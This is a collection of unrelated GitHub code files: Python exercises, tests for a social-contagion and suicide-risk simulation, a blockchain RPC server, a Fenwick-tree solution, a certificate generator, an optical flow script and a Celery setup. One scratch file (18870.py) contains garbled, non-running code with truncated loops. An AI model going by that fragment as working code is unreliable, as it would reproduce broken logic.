other\n\n def __iadd__(self, other):\n if isinstance(other, Currency):\n if other.currency != self.currency:\n raise Exception(f'Cannot add between Currency type {self.currency} and {other.currency}')\n self.amount += other.amount\n elif isinstance(other, int):\n self.amount += other\n return self\n\n\nc1 = Currency('dollar', 5)\nc2 = Currency('dollar', 10)\nc3 = Currency('shekel', 1)\nc4 = Currency('shekel', 10)\n\nprint(str(c1))\nprint(str(c3))\n\nprint(int(c1))\nprint(repr(c1))\nc1 + 5\nprint(c1)\nc1 + c2\nprint(c1)\nc1 += 5\nprint(c1)\nc1 += c2\nprint(c1)\nc1 + c3\n\n\n\n","repo_name":"ilmar521/Bootcamp-Python","sub_path":"Week-9/Day-2/ExerciseXP/Ex2.py","file_name":"Ex2.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"44371229120","text":"#!/usr/bin/python3\nimport re\n\npattern = re.compile(r'(\\d+)-(\\w+)')\nproducts = r\"1-a\\n20-baer\\n34-afcr\"\n\nmatch = pattern.finditer(products)\nfor country in match:\n print (\"Country : \" , country.group(1), \" Code: \", country.group(2))\n\n","repo_name":"alortimor/python_tricks","sub_path":"regular_expressions/country_from_product_code.py","file_name":"country_from_product_code.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"20945401682","text":"from math import exp\nimport igraph as ig\nfrom agent import Agent\n\n\nclass TestAgent:\n def test_init(self):\n a = Agent(id=1, n_beh=100, baserates=None)\n assert (0 < sum(a.beh)) and (sum(a.beh) < 100)\n\n assert isinstance(a, Agent)\n assert hasattr(a, \"id\")\n assert hasattr(a, \"name\")\n assert hasattr(a, \"beh\")\n assert hasattr(a, \"attempts\")\n\n assert a.name == \"id_1\"\n assert a.attempts == 0\n assert isinstance(a.id, int)\n assert isinstance(a.beh, list)\n assert a.current_emulations == 0\n assert a.current_emulated_risk_factors == 0\n\n b = Agent(id=2, n_beh=3, baserates=[0, 0, 0])\n assert sum(b.beh) == 0\n\n c 
= Agent(id=3, n_beh=3, baserates=[1, 1, 1])\n assert sum(c.beh) == 3\n\n d = Agent(id=4, n_beh=100, baserates=[0.25] * 100)\n assert (0 < sum(d.beh)) and (sum(d.beh) < 50)\n\n def test_emulate(self):\n a = Agent(id=1, n_beh=3)\n a.beh = [0, 0, 0]\n\n b = Agent(id=2, n_beh=3)\n b.beh = [1, 1, 1]\n\n c = Agent(id=3, n_beh=3)\n c.beh = [0, 1, 0]\n\n assert a.beh == [0, 0, 0]\n\n a.emulate(b, p=0)\n assert a.beh == [0, 0, 0]\n\n a.emulate(b, p=1)\n assert a.beh == [1, 1, 1]\n\n a.emulate(c, p=1)\n assert a.beh == [0, 1, 0]\n\n def test_emulate_alters(self):\n a = Agent(id=1, n_beh=3)\n a.beh = [0, 0, 0]\n assert a.emulatable_alters == 0\n\n b = Agent(id=2, n_beh=3)\n b.beh = [1, 1, 1]\n\n c = Agent(id=3, n_beh=3)\n c.beh = [2, 2, 2] # normally impossible, but helps for testing\n\n d = Agent(id=4, n_beh=3)\n d.beh = [-1, -1, -1] # normally impossible, but helps for testing\n\n agents = [a, b, c, d]\n net = ig.Graph(edges=[(0, 1), (0, 2), (3, 4), (2, 4)])\n net.vs[\"name\"] = [f\"id_{agent.id}\" for agent in agents]\n\n # no one should be emulated because p = 0\n a.emulate_alters(agents, net, p=0)\n assert a.beh == [0, 0, 0]\n assert a.current_emulations == 0\n assert a.current_emulated_risk_factors == 0\n assert a.emulatable_alters == 2\n\n # only b and c should be emulated given this network arrangement\n a.emulate_alters(agents, net, p=1)\n assert all([b in [1, 2] for b in a.beh])\n assert a.current_emulations == 3\n assert a.current_emulated_risk_factors >= 3\n assert a.emulatable_alters == 2\n\n def test_spontaneously_change(self):\n a = Agent(id=1, n_beh=3)\n a.beh = [0, 0, 0]\n assert a.current_spon_changes == 0\n assert a.current_spon_risk_factors == 0\n\n baserates = [1, 1, 1]\n a.spontaneously_change(baserates, susceptibility=1)\n assert a.beh == [1, 1, 1]\n assert a.current_spon_changes == 3\n assert a.current_spon_risk_factors == 3\n\n baserates = [0, 0, 0]\n a.spontaneously_change(baserates, susceptibility=1)\n assert a.beh == [0, 0, 0]\n assert a.current_spon_changes == 3\n assert a.current_spon_risk_factors == 0\n\n baserates = [0, 1, 0]\n a.spontaneously_change(baserates, susceptibility=1)\n assert a.beh == [0, 1, 0]\n assert a.current_spon_changes == 3\n assert a.current_spon_risk_factors == 1\n\n baserates = [1, 1, 1]\n a.spontaneously_change(baserates, susceptibility=0)\n assert a.beh == [0, 1, 0]\n assert a.current_spon_changes == 0\n assert a.current_spon_risk_factors == 0\n\n def test_network_index(self):\n a = Agent(id=1, n_beh=3)\n b = Agent(id=2, n_beh=3) # connected\n c = Agent(id=3, n_beh=3)\n agents = [a, b, c]\n\n net = ig.Graph(edges=[(0, 1), (0, 2), (1, 3), (1, 4)])\n net.vs[\"name\"] = [f\"id_{agent.id}\" for agent in agents]\n\n assert a.network_index(net) == 0\n assert b.network_index(net) == 1\n assert c.network_index(net) == 2\n\n # Now the vertex indices of this new network are different, so the\n # previous equivalence between the network and agent lists is unreliable.\n # The network_index() method should still work, despite this problem\n net2 = net.induced_subgraph(vertices=[1, 2])\n\n assert a.name not in net2.vs[\"name\"]\n assert net2.vs[0][\"name\"] == b.name\n assert net2.vs[1][\"name\"] == c.name\n assert b.network_index(net2) == 0\n assert c.network_index(net2) == 1\n\n def test_alters(self):\n\n # Intentionally complicated ids to ensure alters can be retrieved,\n # even when agent ids don't directly correspond to network.vs indices\n a = Agent(id=1010, n_beh=3)\n b = Agent(id=232, n_beh=3) # connected\n c = Agent(id=35432, n_beh=3) # connected\n 
d = Agent(id=44124, n_beh=3) # not connected\n e = Agent(id=44, n_beh=3) # not connected\n agents = [a, b, c, d, e]\n\n net = ig.Graph(edges=[(0, 1), (0, 2), (1, 3), (1, 4), (4, 5)])\n net.vs[\"name\"] = [f\"id_{agent.id}\" for agent in agents]\n\n # Shuffling agents so they are intentionally out of order with network.vs\n # vertex order\n agents = [c, b, a, e, d]\n print(net.vs[\"name\"])\n\n # should retrieve b and c, but not d and e\n alters = a.alters(agents=agents, network=net)\n assert alters\n assert isinstance(alters, list)\n assert len(alters) == 2\n assert b in alters\n assert c in alters\n assert d not in alters\n assert e not in alters\n\n # No valid alters, return empty list\n alters = a.alters(agents=[d, e], network=net)\n assert not alters\n assert isinstance(alters, list)\n\n # No agents given, return empty list\n alters = a.alters(agents=[], network=net)\n assert isinstance(alters, list)\n assert not alters\n\n def test_recruit_alters(self):\n # Intentionally odd IDs, to ensure method works when orderly IDs can't\n # be relied on\n a = Agent(id=33, n_beh=3)\n a.beh = [1, 1, 1]\n assert a.recruited_alters == 0\n\n # 66% similar (should recruit when thresh = .50)\n b = Agent(id=101, n_beh=3)\n b.beh = [1, 1, 0]\n\n # only 33% similar (should not recruit, when thresh = .50)\n c = Agent(id=123, n_beh=3)\n c.beh = [1, 0, 0]\n\n agents = [a, b, c]\n\n # desired connection between a and b is intentionally missing\n net = ig.Graph(edges=[(1, 2)])\n net.vs[\"name\"] = [f\"id_{agent.id}\" for agent in agents]\n\n # Use vertex names, no edge attributes\n edges = [(e.source_vertex[\"name\"], e.target_vertex[\"name\"]) for e in net.es]\n assert (\"id_33\", \"id_101\") not in edges # not connected yet\n assert (\"id_33\", \"id_123\") not in edges\n assert (\"id_101\", \"id_123\") in edges\n\n # with this sim_thresh, b should be recruited, but no one else\n a.recruit_alters(agents, net, sim_thresh=0.50)\n assert a.recruited_alters == 1\n\n # Use vertex names, no edge attributes\n edges = [(e.source_vertex[\"name\"], e.target_vertex[\"name\"]) for e in net.es]\n assert (\"id_33\", \"id_101\") in edges # connected now\n assert (\"id_33\", \"id_123\") not in edges\n assert (\"id_101\", \"id_123\") in edges\n\n def test_prune_alters(self):\n # Intentionally odd IDs, to ensure method works when orderly IDs can't\n # be relied on\n a = Agent(id=33, n_beh=3)\n a.beh = [1, 1, 1]\n assert a.pruned_alters == 0\n\n # 66% similar (should NOT prune when thresh = .50)\n b = Agent(id=101, n_beh=3)\n b.beh = [1, 1, 0]\n\n # only 33% similar (should prune, when thresh = .50)\n c = Agent(id=123, n_beh=3)\n c.beh = [1, 0, 0]\n\n agents = [a, b, c]\n # complete network\n net = ig.Graph(edges=[(0, 1), (0, 2), (1, 2)])\n net.vs[\"name\"] = [f\"id_{agent.id}\" for agent in agents]\n\n # Use vertex names, no edge attributes\n edges = [(e.source_vertex[\"name\"], e.target_vertex[\"name\"]) for e in net.es]\n assert (\"id_33\", \"id_101\") in edges\n assert (\"id_33\", \"id_123\") in edges\n assert (\"id_101\", \"id_123\") in edges\n\n # with this sim_thresh b should be retained, but c should be pruned\n a.prune_alters(agents, net, sim_thresh=0.50)\n assert a.pruned_alters == 1\n\n edges = [(e.source_vertex[\"name\"], e.target_vertex[\"name\"]) for e in net.es]\n assert (\"id_33\", \"id_101\") in edges # should be retained\n assert (\"id_33\", \"id_123\") not in edges # should now be gone\n assert (\"id_101\", \"id_123\") in edges # should be totally unaffected\n\n def test_suicide_risk(self):\n\n a = Agent(id=1, 
n_beh=3, baserates=None)\n\n gen_sui_prev = 1 / 100\n beh_odds_ratios = [2, 3, 4]\n\n a.beh = [0, 0, 0]\n p = a.suicide_risk(\n odds_ratios=beh_odds_ratios, gen_sui_prev=gen_sui_prev, gen_ave_beh=0\n )\n assert round(p, 4) == round(gen_sui_prev, 4)\n\n a.beh = [1, 0, 0]\n p = a.suicide_risk(\n odds_ratios=beh_odds_ratios, gen_sui_prev=gen_sui_prev, gen_ave_beh=0\n )\n a_odds = p / (1 - p)\n general_odds = gen_sui_prev / (1 - gen_sui_prev)\n a_odds_ratio = a_odds / general_odds\n assert round(a_odds_ratio, 8) == 2 # with beh_odds_ratios = [2, 3, 4]\n\n a.beh = [1, 0, 1]\n p = a.suicide_risk(\n odds_ratios=beh_odds_ratios, gen_sui_prev=gen_sui_prev, gen_ave_beh=0\n )\n a_odds = p / (1 - p)\n general_odds = gen_sui_prev / (1 - gen_sui_prev)\n a_odds_ratio = a_odds / general_odds\n assert round(a_odds / general_odds, 10) == 8 # with beh_odds_ratios = [2, 3, 4]\n\n # When accounting for gen_ave_beh == 2\n a.beh = [1, 1, 0]\n p = a.suicide_risk(\n odds_ratios=[2, 2, 2], gen_sui_prev=gen_sui_prev, gen_ave_beh=2\n )\n assert round(p, 4) == gen_sui_prev\n\n # When accounting for gen_ave_beh == 1\n a.beh = [1, 1, 1]\n p = a.suicide_risk(\n odds_ratios=[2, 2, 2], gen_sui_prev=gen_sui_prev, gen_ave_beh=1\n )\n a_odds = p / (1 - p)\n general_odds = gen_sui_prev / (1 - gen_sui_prev)\n a_odds_ratio = a_odds / general_odds\n assert round(a_odds_ratio, 8) == 4\n\n def test_consider_suicide(self):\n a = Agent(id=1, n_beh=3, baserates=None)\n\n assert a.attempts == 0\n assert a.current_attempt == 0\n\n gen_sui_prev = 1 / 1000 # very low baserate\n beh_odds_ratios = [1000, 1000, 1000] # very high risk factors\n\n # No beh risk factors implies low attempt prob\n a.beh = [0, 0, 0]\n outcome = a.consider_suicide(\n odds_ratios=beh_odds_ratios, gen_sui_prev=gen_sui_prev, gen_ave_beh=0\n )\n assert outcome == 0\n assert a.attempts == 0\n assert a.current_attempt == 0\n\n # Attempts should happen when a has many beh risk factors\n a.beh = [1, 1, 1]\n outcome = a.consider_suicide(\n odds_ratios=beh_odds_ratios, gen_sui_prev=gen_sui_prev, gen_ave_beh=0\n )\n assert outcome == 1\n assert a.attempts == 1\n assert a.current_attempt == 1\n\n # Test for increment of attempts\n outcome = a.consider_suicide(\n odds_ratios=beh_odds_ratios, gen_sui_prev=gen_sui_prev, gen_ave_beh=0\n )\n assert outcome == 1\n assert a.attempts == 2\n assert a.current_attempt == 1\n","repo_name":"iancero/nhiabm_v2","sub_path":"simulation/tests/test_agent.py","file_name":"test_agent.py","file_ext":"py","file_size_in_byte":11517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"39664511818","text":"from xmlrpc.server import SimpleXMLRPCServer\nfrom xmlrpc.client import ServerProxy\nfrom pymongo.errors import DuplicateKeyError\nfrom node import get_nodes, add_node\nfrom Database.mongoDB import MongoDB\nfrom lib.common import cprint\nfrom utils.crypto import Crypto\nfrom Wallet.p2pkh import P2pkh\n\nserver = None\n\nPORT = 8301\n\np = P2pkh()\nclass RpcServer():\n\n def __init__(self, server):\n self.server = server\n\n def ping(self):\n return True\n\n def get_blockchain(self) -> list:\n bclist = []\n bcdb = MongoDB()\n # Validation\n for x in bcdb.getAll('blockchain'):\n header_bin = str(x['index']) + str(x['timestamp']) + str(x['prevHash']) +\\\n str(x['difficulty']) + str(x['nonce']) + str(x['data']) + str(x['merkleroot'])\n if x['hash'] == Crypto().sha256(Crypto().sha256(header_bin)):\n bclist.append(x)\n MongoDB().close_connect()\n return bclist\n\n def new_block(self, block):\n # 
Validation\n header_bin = str(block['index']) + str(block['timestamp']) + str(block['prevHash']) + \\\n str(block['difficulty']) + str(block['nonce']) + str(block['data']) + str(block['merkleroot'])\n if block['hash'] != Crypto().sha256(Crypto().sha256(header_bin)):\n return False\n try:\n cprint('RPC', block)\n MongoDB().insertOne('blockchain', block)\n cprint('INFO', \"Receive new block.\")\n MongoDB().close_connect()\n return True\n except DuplicateKeyError:\n print('Block already exists, skipped')\n return False\n\n\n\n def get_transactions(self) -> list:\n tdb = MongoDB()\n txs = []\n for x in tdb.getAll(\"transactions\"):\n txs.append(x)\n MongoDB().close_connect()\n return txs\n\n def new_untransaction(self, untx):\n cprint(__name__, untx)\n '''\n verify(self, utxoHash, pack, address) -> bool\n '''\n txid = untx['hash']\n unLockSig = []\n signature = []\n spublickey = []\n address = []\n # get signature and public key from utxo input\n for x in untx['vin']:\n unLockSig.append(x['unLockSig'])\n signature.append(x['unLockSig']['signature'])\n spublickey.append(x['unLockSig']['publickey'])\n for x in untx['vout']:\n address.append(x['lockSig']['senderAddress'])\n # Normal check\n # all inputs must share a single signature\n if len(set(signature)) != 1:\n print('Signature is not consistent')\n return False\n # all inputs must share a single public key\n if len(set(spublickey)) != 1:\n print('Public key is not consistent')\n return False\n # all outputs must share a single sender address\n if len(set(address)) != 1:\n print('Sender address is not consistent')\n return False\n # use public key and transaction id to verify signature\n if not p.verify(txid, unLockSig[0], address[0]):\n print('Signature is not correct')\n return False\n print('Signature is correct')\n # try to store pending transactions, if they exist, then just skip\n try:\n MongoDB().insertOne('ptransactions', untx)\n except DuplicateKeyError:\n print('Pending transaction already exists, skipped')\n cprint('INFO', \"Receive new unchecked transaction.\")\n MongoDB().close_connect()\n return True\n\n def blocked_transactions(self, txs):\n try:\n for x in txs:\n MongoDB().insertOne('transactions', x)\n cprint('INFO', \"Receive new blocked transactions.\")\n MongoDB().close_connect()\n return True\n except DuplicateKeyError:\n print('Transactions already exist, skipped')\n return False\n\n\n def add_node(self, address):\n add_node(address)\n return True\n\n\nclass RpcClient():\n ALLOW_METHOD = ['get_transactions', 'get_blockchain', 'new_block', 'new_untransaction', 'blocked_transactions',\n 'ping', 'add_node']\n\n def __init__(self, node):\n self.node = node\n self.client = ServerProxy(node)\n\n def __getattr__(self, name):\n def noname(*args, **kw):\n if name in self.ALLOW_METHOD:\n return getattr(self.client, name)(*args, **kw)\n\n return noname\n\n\nclass BroadCast():\n # Calling all functions in RpcServer\n def __getattr__(self, name):\n def processes(*args, **kw):\n nodes = get_clients()\n result = []\n for x in nodes:\n try:\n result.append(getattr(x, name)(*args, **kw))\n print(result)\n except ConnectionRefusedError:\n cprint('WARNING', 'Failed to connect to %s when invoking %s' % (x.node, name))\n else:\n cprint('INFORMATION', 'Connected to %s successfully when invoking %s.' 
% (x.node, name))\n return result\n return processes\n\n\ndef start_server(ip, port=8301):\n server = SimpleXMLRPCServer((ip, port))\n rpc = RpcServer(server)\n server.register_instance(rpc)\n server.serve_forever()\n\n\ndef get_clients():\n clients = []\n nodes = get_nodes()\n\n for node in nodes:\n clients.append(RpcClient(node))\n return clients","repo_name":"q27810365/Blockchain-Prototype","sub_path":"rpc.py","file_name":"rpc.py","file_ext":"py","file_size_in_byte":5383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"40976362891","text":"# https://leetcode.cn/problems/coin-bonus/\n# Using dfs order to record node and child node relationship\n\nfrom typing import List\n\nM = int(1e9 + 7)\n\nclass BIT:\n def __init__(self, n):\n self.n = n + 5\n self.sum = [0 for _ in range(n + 10)]\n self.ntimessum = [0 for _ in range(n + 10)]\n \n def lowbit(self, x):\n return x & (-x)\n\n # add k at position pos\n def update(self, pos, k):\n x = pos\n while pos <= self.n:\n self.sum[pos] += k\n self.sum[pos] %= M\n self.ntimessum[pos] += k * (x - 1)\n self.ntimessum[pos] %= M\n pos += self.lowbit(pos)\n \n # range update + point query\n def askis(self, pos):\n if not pos:\n return 0\n ret = 0\n while pos:\n ret += self.sum[pos]\n ret %= M\n pos -= self.lowbit(pos)\n return ret\n \n # point update + range query\n def asksi(self, l, r):\n if l > r:\n return 0\n return self.askis(r) - self.askis(l - 1)\n \n # point update + point query\n def askss(self, pos):\n return self.askis(pos) - self.askis(pos - 1)\n \n # range update + range query\n def askii(self, pos):\n if not pos:\n return 0\n ret = 0\n x = pos\n while pos:\n ret += x * self.sum[pos] - self.ntimessum[pos]\n ret %= M\n pos -= self.lowbit(pos)\n return ret\n\nclass Solution:\n def bonus(self, n: int, leadership: List[List[int]], operations: List[List[int]]) -> List[int]:\n \n # adjacency list\n g = [[] for _ in range(n + 1)]\n begin = [0 for _ in range(n + 1)]\n end = [0 for _ in range(n + 1)]\n id = 1\n\n for l in leadership:\n g[l[0]].append(l[1])\n \n # depth-first search\n def dfs(cur):\n nonlocal id\n begin[cur] = id\n for child in g[cur]:\n dfs(child)\n end[cur] = id\n id += 1\n dfs(1)\n \n # Fenwick tree (binary indexed tree)\n b = BIT(n)\n ret = []\n for q in operations:\n if q[0] == 1:\n b.update(end[q[1]], q[2])\n b.update(end[q[1]] + 1, -q[2])\n elif q[0] == 2:\n b.update(begin[q[1]], q[2])\n b.update(end[q[1]] + 1, -q[2])\n else:\n ans = b.askii(end[q[1]]) - b.askii(begin[q[1]] - 1)\n ret.append((ans % M + M) % M)\n\n return ret\n\n# Author: BNDSllx\n# Link: https://leetcode.cn/problems/coin-bonus/solution/xiao-ai-lao-shi-li-kou-bei-li-jie-zhen-t-rut3/\n# Source: LeetCode (力扣)\n# Copyright belongs to the author. For commercial reprints, please contact the author for authorization; for non-commercial reprints, please cite the source.","repo_name":"wherby/code","sub_path":"algorithm/dfs/dfsForTreeWithChild.py","file_name":"dfsForTreeWithChild.py","file_ext":"py","file_size_in_byte":2726,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"22312572665","text":"from PIL import Image, ImageEnhance\nfrom PIL import ImageFont\nfrom PIL import ImageDraw \nimport openpyxl\n\n#Open workbook and sheet with data\ndoc = openpyxl.load_workbook(\"YOURFILE.xlsx\")\nsheet = doc.get_sheet_by_name(\"SHEET\")\n\n#Save data in list\nnames = []\nlastnames = []\nlevels = []\nfor row in sheet.iter_rows():\n name = row[0].value\n lastname = row[1].value\n level = row[2].value\n #Verify empty slots\n if name is not None and lastname is not None:\n names.append(name)\n lastnames.append(lastname)\n levels.append(level)\n\nc = 0\n\nfor personName,personLastname in zip(names,lastnames):\n #Open image to set fullname to and create a copy to work with\n cert = 
Image.open(\"YOURFILETOADDDATA.png\")\n cert_copy = cert.copy()\n\n #font\n draw = ImageDraw.Draw(cert_copy)\n #font = ImageFont.truetype(\"<font file>\", <size>)\n font = ImageFont.truetype(\"OpenSans-Bold.ttf\", 90)\n font2 = ImageFont.truetype(\"OpenSans-Bold.ttf\", 60)\n #draw.text((x, y),\"Sample Text\",(r,g,b))\n fullname = personName+\" \"+personLastname\n day = \"1\"\n month = \"April\"\n year = \"21\"\n \n #Calculate position\n W, H = cert.size\n w, h = draw.textsize(fullname, font=font)\n \n #(W-w)/2 => to center in x, (H-h)/2 to center in y\n draw.text(((W-w)/2,405),fullname,(0,0,0),font=font ) \n draw.text((440,575),day,(0,0,0),font=font2 ) #day position \n draw.text((670,575),month,(0,0,0),font=font2 ) #month position\n draw.text((1090,575),year,(0,0,0),font=font2 ) #year position\n \n file = \"yourfilename\"+fullname\n \n #apply a few enhancements; enhance() returns a new image, so rebind cert_copy before saving\n contrast = ImageEnhance.Contrast(cert_copy)\n cert_copy = contrast.enhance(5)\n color = ImageEnhance.Color(cert_copy)\n cert_copy = color.enhance(2)\n\n cert_copy.save(file+\".pdf\") #you can change the type of file\n c = c + 1\n\n","repo_name":"AboveZtars/namesoncertificate","sub_path":"Imgeditpil.py","file_name":"Imgeditpil.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"11181352611","text":"from scipy import signal\nimport numpy as np\nimport cv2\nfrom skimage import filters\nfrom matplotlib import pyplot as plt\nfrom PIL import Image\nfrom pylab import *\nimport random\n\n# Pass in the old and new frames (both gray), the row and column of the point to track, and an odd integer window size\ndef my_optical_flow(old_frame,new_frame,row,col,window_size):\n # Written for 1 point not multiple\n\n # Optionally blur images for better estimation\n k = 3 # gauss kernel size\n image_1 = cv2.GaussianBlur(old_frame.copy(),(k,k),0)\n image_2 = cv2.GaussianBlur(new_frame.copy(),(k,k),0)\n\n row = int(np.rint(row))\n col = int(np.rint(col))\n\n # kernel_x = np.array([[-1., 1.], [-1., 1.]])\n # kernel_y = np.array([[-1., -1.], [1., 1.]])\n # kernel_t = np.array([[1., 1.], [1., 1.]])\n kernel_x = np.array([[-1., 1.], [-1., 1.]]) * 0.25\n kernel_y = np.array([[-1., -1.], [1., 1.]]) * 0.25\n kernel_t = np.array([[1., 1.], [1., 1.]]) * 0.25\n \n # Optionally normalize pixels\n # image_1 = image_1 / 255.\n # image_2 = image_2 / 255.\n\n # Calculate I_x, I_y, I_t\n mode = 'same'\n fx = signal.convolve2d(image_1, kernel_x, mode=mode)\n fy = signal.convolve2d(image_1, kernel_y, mode=mode)\n ft = np.add(\n signal.convolve2d(image_2, kernel_t, mode=mode),\n signal.convolve2d(image_1, (-1 * kernel_t), mode=mode)\n ) \n \n # window_size is odd, all the pixels with offset in between [-w, w] are inside the window\n w = int(window_size/2)\n\n # Finding values within window\n Ix = fx[row-w:row+w+1, col-w:col+w+1].flatten()\n Iy = fy[row-w:row+w+1, col-w:col+w+1].flatten()\n It = ft[row-w:row+w+1, col-w:col+w+1].flatten()\n\n A_T = np.array((Ix,Iy))\n A = np.transpose(A_T)\n b = np.expand_dims(np.array(It),axis=1)\n\n u,v = np.linalg.pinv(A_T @ A) @ (A_T @ b)\n\n # Use optical flow comps (u,v) to calc new points + returns 1x2 array\n return np.float32(np.array([[row+v,col+u]]))\n\n\ndef main():\n\n # CODE TO SHOW OPTICAL FLOW DIAGRAMS FOR 2 FRAMES\n w = 7 # Window size\n Image1 = Image.open('basketball1.png').convert('L')\n Image2 = Image.open('basketball2.png').convert('L')\n\n Image1 = np.array(Image1)\n Image2 = np.array(Image2)\n\n # finding the good features\n features = 
cv2.goodFeaturesToTrack(Image1,100,0.01,5)\t\n features = np.int0(features)\n\n c = \"r\" # color for plot\n\n plt.subplot(1,2,1) # Plot 1 for open cv implementation\n plt.title(\"Optical Flow Vectors (OpenCV)\")\n plt.imshow(Image1,cmap = cm.gray)\n\n # Parameters for lucas kanade optical flow\n lk_params = dict( winSize = (w,w), maxLevel = 0, criteria = (cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 0.03))\n for f in features:\n # Compute flow\n feature = np.float32(np.expand_dims(f,axis=0))\n new_p, st, er = cv2.calcOpticalFlowPyrLK(Image1, Image2, feature, None, **lk_params)\n \n new_row, new_col = new_p.ravel()\n\n u = new_col - f[0,1] # dx, change in col\n v = new_row - f[0,0] # dy, change in row\n\n # Plot Arrow\n plt.arrow(f[0,0],f[0,1],u,v,head_width =5, head_length =5, color = c)\n\n plt.subplot(1,2,2) # Plot 2 for our implementation\n plt.title(\"Optical Flow Vectors (Our implementation)\")\n plt.imshow(Image1,cmap = cm.gray)\n\n for f in features: \n row = f[0,0]\n col = f[0,1]\n\n new_p = my_optical_flow(Image1,Image2,row,col,w)\n new_row, new_col = new_p.ravel()\n\n u = new_col - col # dx, change in col\n v = new_row - row # dy, change in row\n\n # Plot Arrow\n plt.arrow(row,col,u,v,head_width =5, head_length =5, color = c)\n\n plt.show()\n\n\nif __name__ == '__main__':\n main()","repo_name":"paloomers/ammp","sub_path":"my_optical.py","file_name":"my_optical.py","file_ext":"py","file_size_in_byte":3723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"18248001497","text":"from collections import deque\nimport copy\nfrom queue import PriorityQueue\nimport sys\n\n# n = int(input())\n# size = [i for i in range(n)]\n# arr = list(map(int, input().split()))\n# arr_c= set(arr)\n# arr_c = sorted(arr_c)\n# data = tuple(zip( arr_c,size))\n\n# data = dict(data)\n\n# for i in arr:\n# print(data[i],end=\" \")\n\n\n# def func(arr):\n# last = arr[-1]\n\n# sum=0\n# for i,data in enumerate(arr[:-1]):\n# sum+=data\n# if sum == last:\n# return i\n# pass\n \n# pass\n\ndef compressword(word, k):\n # 10^5\n word = list(word)\n check = False\n while True:\n i=0\n while i =0:\n \n for idx in reversed(pos[:i+1]): # backwards\n # print(\"p\",idx)\n if idx==0:#even\n pos[i] = even.get() \n else:\n break\n i-=1\n \n for idx in reversed(pos[:i+1]): # backwards\n # print(i, idx)\n if idx==0:#even\n break\n else:\n pos[i] = odd.get()\n i-=1\n print(pos)\n \ndef bubbleSort_DESC(arr):\n n = len(arr)\n for i in range(n):\n for j in range(n-1, i, -1):\n if arr[j] > arr[j-1] and arr[j]%2==0 and arr[j-1]%2==0: #even\n arr[j], arr[j-1] = arr[j-1], arr[j]\n elif arr[j] > arr[j-1] and arr[j]%2!=0 and arr[j-1]%2!=0: #odd\n arr[j], arr[j-1] = arr[j-1], arr[j]\n return arr\n\ndef largest(num):\n num = list(num)\n print(num)\n odd = PriorityQueue() #odd digits\n pos=[]\n\n even = PriorityQueue() # even\n # items enter sorted in ascending order\n for i, data in enumerate(num):\n tmp = data\n \n if int(tmp)%2==0: # even\n func(pos,even,odd)\n even.put(tmp)\n pos.append(0)\n else:\n func(pos,even,odd)\n odd.put(tmp)\n pos.append(1)\n \n \n \n \n print(i,pos)\n \n return \"\".join(pos)\n \n \n\n# s = ['how it was done',\n# 'are you how'\n# ,'it goes to',\n# 'goes done are it']\n\n# q =['done it','it']\n\n\n# # s= ['it go will away'\n# # ,'go do art'\n# # ,'what to will east']\n\n# # q =['it will',\n# # 'go east will',\n# # 'will']\n# print('it' in 'what to will east')\n# print(textQueries(s,q))\na=\"1806579\"#(\"0082663\"\n\nprint(largest(a)) 
#8662003","repo_name":"97tkddnjs/Baekjoon","sub_path":"문제 풀이/스터디/18870.py","file_name":"18870.py","file_ext":"py","file_size_in_byte":3400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"37506496917","text":"from typing import Any\n\nfrom celery import Celery\nfrom smtv_api import database\nfrom smtv_api import settings\nfrom flask import Flask\n\n\nclass CelerySetup:\n flask_app = Flask(__name__)\n flask_app.config.from_object(settings)\n flask_app.config.update(\n CELERY_BROKER_URL=settings.CELERY_BROKER_URL,\n CELERY_RESULT_BACKEND=settings.CELERY_RESULT_BACKEND\n )\n\n @classmethod\n def make_celery(cls) -> Any:\n '''\n\n :return: decorator: celery\n '''\n app = cls.flask_app\n database.db.init_app(app)\n celery = Celery(\n app.import_name,\n backend=app.config['CELERY_RESULT_BACKEND'],\n broker=app.config['CELERY_BROKER_URL'],\n )\n celery.conf.update(app.config)\n\n class ContextTask(celery.Task): # type: ignore\n def __call__(self, *args, **kwargs): # type: ignore\n with app.app_context():\n return self.run(*args, **kwargs)\n\n celery.Task = ContextTask\n return celery\n\n# celery = CelerySetup.make_celery()\n","repo_name":"AdamDomagalsky/smtv-micro-scpr","sub_path":"src/smtv_api/celery_service/celery_setup.py","file_name":"celery_setup.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"11140435076","text":"\"\"\"\nA module that contains several functions for extracting sentiment from Twitter data. The\nfunctions are as follows:\nget_date_range(since_date_str: str) -> tuple[str, str]: Is used to get the exact date\nrange for each month, since months have different number of days.\n\n\nclean_tweet(tweet: str, stopwords: list[str] = []) -> str: This function takes a tweet as\ninput and returns a cleaned version of it. The tweet is cleaned by removing URLs,\n@mentions, hashtags, punctuation, profanity, and non-alphanumeric characters. Optionally,\nthe function can remove a list of stopwords.\n\nget_sentiment_scores(text: str) -> dict[str, float]: This function calculates the\nsentiment scores of the input text using TextBlob and VADER. The function returns a\ndictionary containing the following keys: polarity, subjectivity, sentiment (positive,\nnegative, or neutral), negative score, neutral score, positive score, and compound score.\n\nget_sentiment_label(compound: float) -> str: This function takes a compound sentiment\nscore as input and returns the sentiment label (positive, negative, or neutral) of the\ntext.\n\nscrape_tweets(hashtags: list[str], since_date: str, lang: str, exclude_keywords:\nlist[str], num_tweets: int) -> list[dict]: This function scrapes tweets using snscrape and\nreturns a pandas DataFrame containing the following information about each tweet:\ndatetime, tweet ID, original text, username, likes, 